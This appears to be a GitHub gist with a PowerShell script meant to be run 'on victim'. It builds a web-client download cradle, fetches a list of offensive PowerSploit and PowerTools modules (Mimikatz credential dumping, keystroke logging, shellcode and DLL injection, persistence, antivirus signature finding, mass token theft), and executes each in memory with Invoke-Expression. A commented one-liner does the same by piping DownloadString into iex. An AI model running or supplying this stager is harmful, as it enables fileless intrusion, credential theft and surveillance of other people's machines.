Skip to content

Instantly share code, notes, and snippets.

@davehardy20
Last active July 16, 2018 22:00
Show Gist options
  • Save davehardy20/a81fb1eaabf2512fce88 to your computer and use it in GitHub Desktop.
Save davehardy20/a81fb1eaabf2512fce88 to your computer and use it in GitHub Desktop.
#Most Useful PowerSploit and PowerTools Modules that can be loaded into memory
# Use this line in PowerShell on victim to pull into memory the modules
#(New-Object Net.WebClient).DownloadString("https://gist.githubusercontent.com/davehardy20/a81fb1eaabf2512fce88/raw/0d92460eb8d43183d2ce42e3e7cfa367740426b6/in-memory-downloader.ps1")|iex
$downloadcradle = New-Object Net.WebClient
$modules = @(
"https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-NinjaCopy.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/VolumeShadowCopyTools.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Get-TimedScreenshot.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1","https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerUp/PowerUp.ps1","https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerView/powerview.ps1","https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PewPewPew/Invoke-MassCommand.ps1","https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1","https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PewPewPew/Invoke-MassSearch.ps1","https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PewPewPew/Invoke-MassTemplate.ps1","https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PewPewPew/Invoke-MassTokens.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Persistence/Persistence.psm1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/AntivirusBypass/Find-AVSignature.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-ShellcodeMSIL.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Recon/Invoke-Portscan.ps1")
#Build the download command line iterate through modules and import
ForEach ($module in $modules) {
$command = $($downloadcradle).DownloadString($($module))
Invoke-Expression $command
}
@kakaibanonoy12
Copy link

VIPWow151

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment